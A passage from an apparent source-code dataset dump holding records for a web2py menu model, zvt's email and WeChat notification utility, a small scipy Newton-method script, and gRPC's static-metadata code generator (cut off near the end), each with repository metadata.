#########################################################################
response.menu = [
(T('Home'), False, URL('default', 'index'), [])
]
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
# shortcuts
app = request.application
ctr = request.controller
# useful links to internal and external resources
response.menu += [
(SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
(T('My Sites'), False, URL('admin', 'default', 'site')),
(T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
(T('Controller'), False,
URL(
'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
(T('View'), False,
URL(
'admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
(T('Layout'), False,
URL(
'admin', 'default', 'edit/%s/views/layout.html' % app)),
(T('Stylesheet'), False,
URL(
'admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
(T('DB Model'), False,
URL(
'admin', 'default', 'edit/%s/models/db.py' % app)),
(T('Menu Model'), False,
URL(
'admin', 'default', 'edit/%s/models/menu.py' % app)),
(T('Database'), False, URL(app, 'appadmin', 'index')),
(T('Errors'), False, URL(
'admin', 'default', 'errors/' + app)),
(T('About'), False, URL(
'admin', 'default', 'about/' + app)),
]),
('web2py.com', False, 'http://www.web2py.com', [
(T('Download'), False,
'http://www.web2py.com/examples/default/download'),
(T('Support'), False,
'http://www.web2py.com/examples/default/support'),
(T('Demo'), False, 'http://web2py.com/demo_admin'),
(T('Quick Examples'), False,
'http://web2py.com/examples/default/examples'),
(T('FAQ'), False, 'http://web2py.com/AlterEgo'),
(T('Videos'), False,
'http://www.web2py.com/examples/default/videos/'),
(T('Free Applications'),
False, 'http://web2py.com/appliances'),
(T('Plugins'), False, 'http://web2py.com/plugins'),
(T('Layouts'), False, 'http://web2py.com/layouts'),
(T('Recipes'), False, 'http://web2pyslices.com/'),
(T('Semantic'), False, 'http://web2py.com/semantic'),
]),
(T('Documentation'), False, 'http://www.web2py.com/book', [
(T('Preface'), False,
'http://www.web2py.com/book/default/chapter/00'),
(T('Introduction'), False,
'http://www.web2py.com/book/default/chapter/01'),
(T('Python'), False,
'http://www.web2py.com/book/default/chapter/02'),
(T('Overview'), False,
'http://www.web2py.com/book/default/chapter/03'),
(T('The Core'), False,
'http://www.web2py.com/book/default/chapter/04'),
(T('The Views'), False,
'http://www.web2py.com/book/default/chapter/05'),
(T('Database'), False,
'http://www.web2py.com/book/default/chapter/06'),
(T('Forms and Validators'), False,
'http://www.web2py.com/book/default/chapter/07'),
(T('Email and SMS'), False,
'http://www.web2py.com/book/default/chapter/08'),
(T('Access Control'), False,
'http://www.web2py.com/book/default/chapter/09'),
(T('Services'), False,
'http://www.web2py.com/book/default/chapter/10'),
(T('Ajax Recipes'), False,
'http://www.web2py.com/book/default/chapter/11'),
(T('Components and Plugins'), False,
'http://www.web2py.com/book/default/chapter/12'),
(T('Deployment Recipes'), False,
'http://www.web2py.com/book/default/chapter/13'),
(T('Other Recipes'), False,
'http://www.web2py.com/book/default/chapter/14'),
(T('Buy this book'), False,
'http://stores.lulu.com/web2py'),
]),
(T('Community'), False, None, [
(T('Groups'), False,
'http://www.web2py.com/examples/default/usergroups'),
(T('Twitter'), False, 'http://twitter.com/web2py'),
(T('Live Chat'), False,
'http://webchat.freenode.net/?channels=web2py'),
]),
(T('Plugins'), False, None, [
('plugin_wiki', False,
'http://web2py.com/examples/default/download'),
(T('Other Plugins'), False,
'http://web2py.com/plugins'),
(T('Layout Plugins'),
False, 'http://web2py.com/layouts'),
])
]
)]
if DEVELOPMENT_MENU: _()
if "auth" in locals(): auth.wikimenu()
| 44.319149
| 79
| 0.478957
| true
| true
|
|
f705a92454724dc469a9dcc20bbdf310e2ec08ca
| 6,419
|
py
|
Python
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 10
|
2020-08-08T04:43:00.000Z
|
2021-07-23T05:38:11.000Z
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 1
|
2021-08-14T12:19:18.000Z
|
2021-09-30T06:44:04.000Z
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 1
|
2021-12-16T01:57:37.000Z
|
2021-12-16T01:57:37.000Z
|
# -*- coding: utf-8 -*-
import email
import json
import logging
import smtplib
from email.header import Header
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from zvt import zvt_config
from zvt.networking.request import get_http_session, sync_get, sync_post
class Informer(object):
logger = logging.getLogger(__name__)
def send_message(self, to_user, title, body, **kwargs):
pass
class EmailInformer(Informer):
def __init__(self, ssl=True) -> None:
super().__init__()
self.ssl = ssl
def send_message_(self, to_user, title, body, **kwargs):
host = zvt_config['smtp_host']
port = zvt_config['smtp_port']
if self.ssl:
try:
smtp_client = smtplib.SMTP_SSL(host=host, port=port)
except:
smtp_client = smtplib.SMTP_SSL()
else:
try:
smtp_client = smtplib.SMTP(host=host, port=port)
except:
smtp_client = smtplib.SMTP()
smtp_client.connect(host=host, port=port)
smtp_client.login(zvt_config['email_username'], zvt_config['email_password'])
msg = MIMEMultipart('alternative')
msg['Subject'] = Header(title).encode()
msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username'])
if type(to_user) is list:
msg['To'] = ", ".join(to_user)
else:
msg['To'] = to_user
msg['Message-id'] = email.utils.make_msgid()
msg['Date'] = email.utils.formatdate()
plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8')
msg.attach(plain_text)
try:
smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string())
except Exception as e:
self.logger.exception('send email failed', e)
def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs):
if type(to_user) is list and sub_size:
size = len(to_user)
if size >= sub_size:
step_size = int(size / sub_size)
if size % sub_size:
step_size = step_size + 1
else:
step_size = 1
for step in range(step_size):
sub_to_user = to_user[sub_size * step:sub_size * (step + 1)]
if with_sender:
sub_to_user.append(zvt_config['email_username'])
self.send_message_(sub_to_user, title, body, **kwargs)
else:
self.send_message_(to_user, title, body, **kwargs)
class WechatInformer(Informer):
GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format(
zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect'])
GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}"
SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}"
token = None
def __init__(self, http_session) -> None:
self.refresh_token(http_session)
def refresh_token(self, http_session):
resp = sync_get(http_session, self.GET_TOKEN_URL)
self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text))
if resp.status_code == 200 and resp.json() and 'access_token' in resp.json():
self.token = resp.json()['access_token']
else:
self.logger.exception("could not refresh_token")
def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct):
the_json = self._format_price_notification(to_user, security_name, current_price, change_pct)
the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8')
json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data)
if json_result is not None:
self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json))
def _format_price_notification(self, to_user, security_name, current_price, change_pct):
if change_pct > 0:
title = '吃肉喝汤'
else:
title = '关灯吃面'
# 先固定一个template
# {
# "template_id": "mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U",
# "title": "涨跌幅提醒",
# "primary_industry": "金融业",
# "deputy_industry": "证券|基金|理财|信托",
# "content": "{{first.DATA}}\n股票名:{{keyword1.DATA}}\n最新价:{{keyword2.DATA}}\n涨跌幅:{{keyword3.DATA}}\n{{remark.DATA}}",
# "example": "您好,腾新控股最新价130.50元,上涨达到设置的3.2%\r\n股票名:腾讯控股(00700)\r\n最新价:130.50元\r\n涨跌幅:+3.2%\r\n点击查看最新实时行情。"
# }
template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U'
the_json = {
"touser": to_user,
"template_id": template_id,
"url": "http://www.foolcage.com",
"data": {
"first": {
"value": title,
"color": "#173177"
},
"keyword1": {
"value": security_name,
"color": "#173177"
},
"keyword2": {
"value": current_price,
"color": "#173177"
},
"keyword3": {
"value": '{:.2%}'.format(change_pct),
"color": "#173177"
},
"remark": {
"value": "会所嫩模 Or 下海干活?",
"color": "#173177"
}
}
}
return the_json
if __name__ == '__main__':
email_action = EmailInformer()
email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20)
http_session = get_http_session()
weixin_action = WechatInformer(http_session)
weixin_action.send_price_notification(http_session,
to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q',
security_name='BTC/USDT',
current_price=1000,
change_pct='0.5%')
# the __all__ is generated
__all__ = ['Informer', 'EmailInformer', 'WechatInformer']
| 37.319767
| 128
| 0.572986
|
import email
import json
import logging
import smtplib
from email.header import Header
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from zvt import zvt_config
from zvt.networking.request import get_http_session, sync_get, sync_post
class Informer(object):
logger = logging.getLogger(__name__)
def send_message(self, to_user, title, body, **kwargs):
pass
class EmailInformer(Informer):
def __init__(self, ssl=True) -> None:
super().__init__()
self.ssl = ssl
def send_message_(self, to_user, title, body, **kwargs):
host = zvt_config['smtp_host']
port = zvt_config['smtp_port']
if self.ssl:
try:
smtp_client = smtplib.SMTP_SSL(host=host, port=port)
except:
smtp_client = smtplib.SMTP_SSL()
else:
try:
smtp_client = smtplib.SMTP(host=host, port=port)
except:
smtp_client = smtplib.SMTP()
smtp_client.connect(host=host, port=port)
smtp_client.login(zvt_config['email_username'], zvt_config['email_password'])
msg = MIMEMultipart('alternative')
msg['Subject'] = Header(title).encode()
msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username'])
if type(to_user) is list:
msg['To'] = ", ".join(to_user)
else:
msg['To'] = to_user
msg['Message-id'] = email.utils.make_msgid()
msg['Date'] = email.utils.formatdate()
plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8')
msg.attach(plain_text)
try:
smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string())
except Exception as e:
self.logger.exception('send email failed', e)
def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs):
if type(to_user) is list and sub_size:
size = len(to_user)
if size >= sub_size:
step_size = int(size / sub_size)
if size % sub_size:
step_size = step_size + 1
else:
step_size = 1
for step in range(step_size):
sub_to_user = to_user[sub_size * step:sub_size * (step + 1)]
if with_sender:
sub_to_user.append(zvt_config['email_username'])
self.send_message_(sub_to_user, title, body, **kwargs)
else:
self.send_message_(to_user, title, body, **kwargs)
class WechatInformer(Informer):
GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format(
zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect'])
GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}"
SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}"
token = None
def __init__(self, http_session) -> None:
self.refresh_token(http_session)
def refresh_token(self, http_session):
resp = sync_get(http_session, self.GET_TOKEN_URL)
self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text))
if resp.status_code == 200 and resp.json() and 'access_token' in resp.json():
self.token = resp.json()['access_token']
else:
self.logger.exception("could not refresh_token")
def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct):
the_json = self._format_price_notification(to_user, security_name, current_price, change_pct)
the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8')
json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data)
if json_result is not None:
self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json))
def _format_price_notification(self, to_user, security_name, current_price, change_pct):
if change_pct > 0:
title = '吃肉喝汤'
else:
title = '关灯吃面'
template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U'
the_json = {
"touser": to_user,
"template_id": template_id,
"url": "http://www.foolcage.com",
"data": {
"first": {
"value": title,
"color": "#173177"
},
"keyword1": {
"value": security_name,
"color": "#173177"
},
"keyword2": {
"value": current_price,
"color": "#173177"
},
"keyword3": {
"value": '{:.2%}'.format(change_pct),
"color": "#173177"
},
"remark": {
"value": "会所嫩模 Or 下海干活?",
"color": "#173177"
}
}
}
return the_json
if __name__ == '__main__':
email_action = EmailInformer()
email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20)
http_session = get_http_session()
weixin_action = WechatInformer(http_session)
weixin_action.send_price_notification(http_session,
to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q',
security_name='BTC/USDT',
current_price=1000,
change_pct='0.5%')
__all__ = ['Informer', 'EmailInformer', 'WechatInformer']
| true
| true
|
f705a95dd49f7443385a19b9bb52262d3489eae7
| 277
|
py
|
Python
|
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import optimize
def f(x, a): return x**3 - a
def fder(x, a): return 3 * x**2
rng = np.random.default_rng()
x = rng.standard_normal(100)
a = np.arange(-50, 50)
vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200)
print(vec_res)
| 21.307692
| 69
| 0.6787
|
import numpy as np
from scipy import optimize
def f(x, a): return x**3 - a
def fder(x, a): return 3 * x**2
rng = np.random.default_rng()
x = rng.standard_normal(100)
a = np.arange(-50, 50)
vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200)
print(vec_res)
| true
| true
|
f705a9bd41c3c5d52a4114e43e885fd40f95eb2b
| 18,618
|
py
|
Python
|
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | 1
|
2020-02-22T04:55:43.000Z
|
2020-02-22T04:55:43.000Z
|
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | null | null | null |
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
# Configuration: a list of either strings or 2-tuples of strings.
# A single string represents a static grpc_mdstr.
# A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will
# also be created).
# The list of 2-tuples must begin with the static hpack table elements as
# defined by RFC 7541 and be in the same order because of an hpack encoding
# performance optimization that relies on this. If you want to change this, then
# you must change the implementation of the encoding optimization as well.
CONFIG = [
# metadata strings
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
# channel arg keys
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
# well known method names
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
# compression algorithm names
'deflate',
'gzip',
'stream/gzip',
# metadata elements
# begin hpack static elements
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
# end hpack static elements
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-token', ''),
('lb-cost-bin', ''),
]
# All entries here are ignored when counting non-default initial metadata that
# prevents the chttp2 server from sending a Trailers-Only response.
METADATA_BATCH_CALLOUTS = [
# (name)
(':path'),
(':method'),
(':status'),
(':authority'),
(':scheme'),
('te'),
('grpc-message'),
('grpc-status'),
('grpc-payload-bin'),
('grpc-encoding'),
('grpc-accept-encoding'),
('grpc-server-stats-bin'),
('grpc-tags-bin'),
('grpc-trace-bin'),
('content-type'),
('content-encoding'),
('accept-encoding'),
('grpc-internal-encoding-request'),
('grpc-internal-stream-encoding-request'),
('user-agent'),
('host'),
('lb-token'),
('grpc-previous-rpc-attempts'),
('grpc-retry-pushback-ms'),
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
# utility: mangle the name of a config
def mangle(elem, name=None):
xl = {
'-': '_',
':': '',
'/': 'slash',
'.': 'dot',
',': 'comma',
' ': '_',
}
def m0(x):
if not x:
return 'empty'
r = ''
for c in x:
put = xl.get(c, c.lower())
if not put:
continue
last_is_underscore = r[-1] == '_' if r else True
if last_is_underscore and put == '_':
continue
elif len(put) > 1:
if not last_is_underscore:
r += '_'
r += put
r += '_'
else:
r += put
if r[-1] == '_':
r = r[:-1]
return r
def n(default, name=name):
if name is None:
return 'grpc_%s_' % default
if name == '':
return ''
return 'grpc_%s_' % name
if isinstance(elem, tuple):
return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1]))
else:
return '%s%s' % (n('mdstr'), m0(elem))
# utility: generate some hash value for a string
def fake_hash(elem):
return hashlib.md5(elem).hexdigest()[0:8]
# utility: print a big comment block into a set of files
def put_banner(files, banner):
for f in files:
print >> f, '/*'
for line in banner:
print >> f, ' * %s' % line
print >> f, ' */'
print >> f
# build a list of all the strings we need
all_strs = list()
all_elems = list()
static_userdata = {}
# put metadata batch callouts first, to make the check of if a static metadata
# string is a callout trivial
for elem in METADATA_BATCH_CALLOUTS:
if elem not in all_strs:
all_strs.append(elem)
for elem in CONFIG:
if isinstance(elem, tuple):
if elem[0] not in all_strs:
all_strs.append(elem[0])
if elem[1] not in all_strs:
all_strs.append(elem[1])
if elem not in all_elems:
all_elems.append(elem)
else:
if elem not in all_strs:
all_strs.append(elem)
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
val = ','.join(COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('grpc-accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
stream_compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
# output configuration
args = sys.argv[1:]
H = None
C = None
D = None
if args:
if 'header' in args:
H = sys.stdout
else:
H = open('/dev/null', 'w')
if 'source' in args:
C = sys.stdout
else:
C = open('/dev/null', 'w')
if 'dictionary' in args:
D = sys.stdout
else:
D = open('/dev/null', 'w')
else:
H = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.h'), 'w')
C = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.cc'), 'w')
D = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w')
# copy-paste copyright notice from this file
with open(sys.argv[0]) as my_source:
copyright = []
for line in my_source:
if line[0] != '#':
break
for line in my_source:
if line[0] == '#':
copyright.append(line)
break
for line in my_source:
if line[0] != '#':
break
copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
out = "\""
for c in line:
if 32 <= c < 127:
if c != ord('"'):
out += chr(c)
else:
out += "\\\""
else:
out += '\\x%02X' % c
return out + "\""
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H
print >> H, '#include <grpc/support/port_platform.h>'
print >> H
print >> H, '#include "src/core/lib/transport/metadata.h"'
print >> H
print >> C, '#include <grpc/support/port_platform.h>'
print >> C
print >> C, '#include "src/core/lib/transport/static_metadata.h"'
print >> C
print >> C, '#include "src/core/lib/slice/slice_internal.h"'
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def(i):
return ('{&grpc_static_metadata_refcounts[%d],'
' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i]))
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs)
print >> H, ('extern const grpc_slice '
'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];')
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '#define %s (grpc_static_slice_table[%d])' % (
mangle(elem).upper(), i)
print >> H
print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> C, 'static void static_ref(void *unused) {}'
print >> C, 'static void static_unref(void *unused) {}'
print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = '
'{static_ref, static_unref, grpc_slice_default_eq_impl, '
'grpc_slice_default_hash_impl};')
print >> H, ('extern const grpc_slice_refcount_vtable '
'grpc_static_metadata_vtable;')
print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = '
'{static_ref, static_unref, grpc_static_slice_eq, '
'grpc_static_slice_hash};')
print >> C, ('static grpc_slice_refcount static_sub_refcnt = '
'{&static_sub_vtable, &static_sub_refcnt};')
print >> H, ('extern grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];')
print >> C, ('grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {')
for i, elem in enumerate(all_strs):
print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},'
print >> C, '};'
print >> C
print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\'
print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == '
'&grpc_static_metadata_vtable)')
print >> H
print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]'
' = {')
for i, elem in enumerate(all_strs):
print >> C, slice_def(i) + ','
print >> C, '};'
print >> C
print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\'
print >> H, (' ((int)((static_slice).refcount - '
'grpc_static_metadata_refcounts))')
print >> H
print >> D, '# hpack fuzzing dictionary'
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems)
print >> H, ('extern grpc_mdelem_data '
'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];')
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('#define %s (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[%d], '
'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i)
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def str_idx(s):
for i, s2 in enumerate(all_strs):
if s == s2:
return i
def md_idx(m):
for i, m2 in enumerate(all_elems):
if m == m2:
return i
def offset_trials(mink):
yield 0
for i in range(1, 100):
for mul in [-1, 1]:
yield mul * i
def perfect_hash(keys, name):
p = perfection.hash_parameters(keys)
def f(i, p=p):
i += p.offset
x = i % p.t
y = i / p.t
return x + p.r[y]
return {
'PHASHRANGE': p.t - 1 + max(p.r),
'PHASHNKEYS': len(p.slots),
'pyfunc': f,
'code': """
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
i %(offset_sign)s= %(offset)d;
uint32_t x = i %% %(t)d;
uint32_t y = i / %(t)d;
uint32_t h = x;
if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
uint32_t delta = (uint32_t)%(name)s_r[y];
h += delta;
}
return h;
}
""" % {
'name': name,
'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
't': p.t,
'offset': abs(p.offset),
'offset_sign': '+' if p.offset > 0 else '-'
}
}
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHRANGE'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for a, b in all_elems:
print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b)))
print >> C, '};'
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
